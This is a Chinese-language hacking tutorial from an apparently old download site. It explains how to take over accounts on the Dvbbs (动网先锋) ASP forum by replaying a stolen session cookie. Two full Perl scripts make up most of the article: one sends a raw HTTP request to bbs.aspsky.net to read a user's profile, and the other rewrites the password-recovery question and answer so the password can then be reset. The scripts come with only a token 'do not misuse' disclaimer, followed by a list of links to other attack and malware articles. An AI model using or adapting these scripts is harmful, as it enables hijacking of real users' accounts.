突破动网先锋asp论坛的密码加密限制
对动网先锋asp论坛的安全性分析----跨站脚本攻击应用(shocknet)的文章大家不知道看过没有,动网论坛密码和提示问题答案是md5加密过的,拿到cookie也没什么价值。
=版权所有 软件 下载 学院 版权所有=我们可以换一种思路,拿到cookie后,通过发送一个请求取的用户的相关资料,然后再发送个请求修改用户提示问题以及答案。
声明:
以下的两个脚本尽供参考,请勿用作非法用途,否则一切后果自负!
hiallone是我在动网论坛注册的用来测试的用户,大家可以看看演示效果
http://enter.3322.net/cgi-bin/dongw.cgi http://enter.3322.net/cgi-bin/dongw1.cgi #!/usr/bin/perl#取得用户资料
# http://enter.3322.net/cgi-bin/dongw.cgi use socket;$host = "bbs.aspsky.net";$port = 80;$str = "";$len =length($str);$req = "post /mymodify.asp?name=hiallone http/1.1\r\n". "host: $host\r\n". "accept: */*\r\n". "cookie: aspsky=password=965eb72c92a549dd&usercookies=0&username=hiallone&userclass=%c2%db%cc%b3%d3%ce%c3%f1&upnum=1;\r\n". "content-type: application/x-www-form-urlencoded\r\n". "content-length: $len\n\n". "$str\n\n";@re =sendraw($req);print "content-type: text/html\n\n";print "@re";sub sendraw { my ($req) = @_; my $target; $target = inet_aton($host) || die("inet_aton problems"); socket(s,pf_inet,sock_stream,getprotobyname(tcp)||0) || die("socket problems\n"); if(connect(s,pack "sna4x8",2,$port,$target)){ select(s); $| = 1; print $req; my @res = <s>; select(stdout); close(s); return @res; } else { die("cant connect...\n"); }} --------------------------------------------------------------------------------------------------------------------------------- #!/usr/bin/perl#修改提示问题以及答案,在这里我们可以修改quesion=whoami21&answer=superdao
#那么你可以去改他的密码了,呵呵!
#http://enter.3322.net/cgi-bin/dongw1.cgi use socket;$host = "bbs.aspsky.net";$port = 80;$str = sex=1&psw=965eb72c92a549dd&quesion=whoami21&answer=superdao&oldanswer=076d0cca420653d4&email=o00o@800e.net&birthyear=&birthmonth=&birthday=&face=pic%2fimage1.gif&myface=pic%2fimage1.gif&width=22&height=22&url=&groupname=%ce%de%c3%c5%ce%de%c5%c9&oicq=&icq=&msn=&showre=1&signature=&usercookies=0&submit=%b8%fc+%d0%c2;$len =length($str); $req = "post /mymodify.asp?action=updat&username=hiallone http/1.1\r\n". "host: $host\r\n". "accept-language: zh-cn\r\n". "content-type: application/x-www-form-urlencoded\r\n". "accept-encoding: gzip, deflate\r\n". "user-agent: mozilla/4.0 (compatible; msie 5.0; windows 98; digext)\r\n". "cookie: aspsky=upnum=1&password=965eb72c92a549dd&userclass=%c2%db%cc%b3%d3%ce%c3%f1&username=hiallone&usercookies=0\r\n". "content-length: $len\r\n". "connection: keep-alive\n\n". "$str\n\n"; @re =sendraw($req);print "content-type: text/html\n\n";print "@re";sub sendraw { my ($req) = @_; my $target; $target = inet_aton($host) || die("inet_aton problems"); socket(s,pf_inet,sock_stream,getprotobyname(tcp)||0) || die("socket problems\n"); if(connect(s,pack "sna4x8",2,$port,$target)){ select(s); $| = 1; print $req; my @res = <s>; select(stdout); close(s); return @res; } else { die("cant connect...\n"); }} =版权所有 软件 下载 学院 版权所有=
↓相关文章:
- · 如何对PHP程序中的常见漏洞进行攻击
- · 如何对PHP程序中的常见漏洞进行攻击(上)
- · 如何对PHP程序中的常见漏洞进行攻击(下)
- · 乔客论坛存在的安全隐患
- · 破解搜毒网会员管理程序
- · 漂亮但不安全的CTB
- · 利用SQL Injection With Access漏洞猜测用户和密码的东东
- · 接踵而至的LB5K论坛漏洞
- · 几个VBB的跨站脚本执行漏洞小结
- · CMOS开机密码解密集锦
- · Win2000的系统安全防范对策
- · 回眸一看 操作系统发展的历程
- · 小木马cnc源代码及开发文档
- · 一个主引导区病毒的分析
- · 一个简单的文件型病毒程序
- · 一个写硬盘的VBS脚本程序
- · unix系统病毒概述
- · WinNT下使用匿名获得admin权限的几个方法
- · 配置 VMware通过令牌访问LAN
- · Debug 使用简介
- · IE即可轻松远程控制对方电脑
- · 如何利用OutLook漏洞编写病毒脚本
- · “混客绝情炸弹”源代码(1)及手工清除
- · “求职信”病毒/蠕虫行为深入分析
- · 编写感染COM与EXE文件的病毒的样例程序
- · 在Win 2003中配置ASP.net环境
- · 将病毒斩草除根
- · 手机病毒
- · 使用TCP/IP协议栈指纹进行远程操作系统辨识
- · 安全维护 IIS asp 站点的高级技巧
- · 防止内部IP地址泄漏的2种方法
- · 网络常见攻击与防范完全手册
- · Windows NT2000下的硬盘锁
- · CIH硬盘数据恢复方法与实例
- · 清除双关联木马“聪明基因”
- · 104种木马手工清除方法
- · 如何隐藏程序的运行
- · 六十四、WINOWS NT4.0下的网络安全性
- · 六十二、从DOS直接入网NT
- · 六十一、NT网的无盘工作站远程登陆
- · 六十、Windows NT4.0网络中漫游用户配置文件的建立
- · 五十九、配置广域网中的Windows NT
- · 五十八、NT Server用作Internet的网关
- · 五十六、 NT网卡和Novell网卡互用
- · 五十四、如何使NT4.0支持你的调制解调器
- · 本地攻击者利用FreeBSD4.3设计漏洞取得系统特权
- · 计算机网络系统安全漏洞分类研究
- · 利用万象来控制整个网吧
- · WIN2000的输入法入侵
- · 傲者TXT炸弹(标准版)
- · 主页木马的制作方法
- · IIS UNICODE Bug
- · BBS3000漏洞
- · CGI漏洞集锦
- · SNMP漏洞威胁网络安全
- · 安全专家欲以黑制黑
- · 用net命令使局域网文件批量同步更新
- · 安全高招:让溢出攻击远离我们
- · Firefox使用技巧六则
- · 支持Rss,优化速度:傲游1.2.0发布